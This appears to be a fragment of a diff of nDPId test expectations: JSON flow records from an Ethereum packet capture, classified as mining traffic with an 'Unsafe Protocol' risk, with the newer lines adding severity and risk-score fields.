+00798{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365885,"flow_last_seen":1578508366042,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":1332,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"207.180.206.216","src_port":56681,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365295,"flow_last_seen":1578508365885,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":435,"flow_tot_l4_payload_len":1172,"flow_avg_l4_payload_len":39,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.229.232.19","src_port":56662,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364925,"flow_last_seen":1578508364954,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":551,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.180.246.169","src_port":30303,"dst_port":30301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00799{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1578508364697,"flow_last_seen":1578508364773,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1136,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":550,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"54.36.160.211","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508365567,"flow_last_seen":1578508365567,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":128,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":128,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"106.12.39.168","src_port":30303,"dst_port":30333,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508366073,"flow_last_seen":1578508366119,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":407,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":101,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364522,"flow_last_seen":1578508364664,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":495,"flow_tot_l4_payload_len":1247,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.158.244.151","src_port":56615,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365038,"flow_last_seen":1578508365038,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.230.108.42","src_port":56644,"dst_port":30303,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Mining.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508365038,"flow_last_seen":1578508365038,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.230.108.42","src_port":56644,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1578508364632,"flow_last_seen":1578508364787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":1065,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1578508364682,"flow_last_seen":1578508364899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":479,"flow_tot_l4_payload_len":1222,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508364523,"flow_last_seen":1578508364743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"89.38.99.34","src_port":56624,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508365189,"flow_last_seen":1578508365331,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":508,"flow_tot_l4_payload_len":1435,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508364272,"flow_last_seen":1578508364272,"flow_idle_time":180000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"3.112.138.57","dst_ip":"192.168.1.184","src_port":25516,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1578508364522,"flow_last_seen":1578508365440,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":574,"flow_tot_l4_payload_len":1274,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"165.22.107.33","src_port":56610,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508362274,"flow_last_seen":1578508363333,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"87.14.222.25","dst_ip":"192.168.1.184","src_port":56693,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":64,"flow_first_seen":1578508365239,"flow_last_seen":1578508365961,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":583,"flow_tot_l4_payload_len":1758,"flow_avg_l4_payload_len":27,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"157.230.152.87","src_port":56658,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1578508365021,"flow_last_seen":1578508365192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":415,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":43,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.10.218","src_port":56642,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1578508365029,"flow_last_seen":1578508365211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":469,"flow_tot_l4_payload_len":1379,"flow_avg_l4_payload_len":25,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.62.29.183","src_port":56643,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508365588,"flow_last_seen":1578508365744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":389,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":56670,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508364732,"flow_last_seen":1578508365736,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"111.229.0.180","src_port":30303,"dst_port":20182,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1578508364523,"flow_last_seen":1578508364723,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":1218,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"34.255.23.113","src_port":56627,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1578508364523,"flow_last_seen":1578508365220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":453,"flow_tot_l4_payload_len":1207,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":56618,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1578508365712,"flow_last_seen":1578508366123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":567,"flow_tot_l4_payload_len":1842,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"78.47.147.155","src_port":56673,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508365919,"flow_last_seen":1578508365951,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":275,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"167.86.122.50","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1578508364776,"flow_last_seen":1578508365781,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"209.97.143.1","src_port":30303,"dst_port":50000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1578508364382,"flow_last_seen":1578508364651,"flow_idle_time":180000,"flow_min_l4_payload_len":171,"flow_max_l4_payload_len":1057,"flow_tot_l4_payload_len":3306,"flow_avg_l4_payload_len":551,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"52.231.165.108","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508363692,"flow_last_seen":1578508363692,"flow_idle_time":180000,"flow_min_l4_payload_len":129,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":129,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"60.191.32.71","dst_ip":"192.168.1.184","src_port":30303,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365408,"flow_last_seen":1578508365790,"flow_idle_time":180000,"flow_min_l4_payload_len":128,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":554,"flow_avg_l4_payload_len":138,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"183.129.242.164","dst_ip":"192.168.1.184","src_port":1024,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1578508364523,"flow_last_seen":1578508364687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":546,"flow_tot_l4_payload_len":1846,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"178.128.195.220","src_port":56626,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1578508365194,"flow_last_seen":1578508366069,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":1326,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"202.112.28.106","src_port":56655,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
-00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1578508364523,"flow_last_seen":1578508365619,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"5.1.83.226","src_port":56625,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1578508364632,"flow_last_seen":1578508364787,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":421,"flow_tot_l4_payload_len":1065,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.60.79","src_port":56629,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1578508364682,"flow_last_seen":1578508364899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":479,"flow_tot_l4_payload_len":1222,"flow_avg_l4_payload_len":29,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.38.81.180","src_port":56632,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1578508364523,"flow_last_seen":1578508364743,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":1432,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"89.38.99.34","src_port":56624,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1578508365189,"flow_last_seen":1578508365331,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":508,"flow_tot_l4_payload_len":1435,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"85.214.108.52","src_port":56654,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00795{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1578508364272,"flow_last_seen":1578508364272,"flow_idle_time":180000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"3.112.138.57","dst_ip":"192.168.1.184","src_port":25516,"dst_port":30303,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1578508364522,"flow_last_seen":1578508365440,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":574,"flow_tot_l4_payload_len":1274,"flow_avg_l4_payload_len":28,"midstream":0,"ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"165.22.107.33","src_port":56610,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
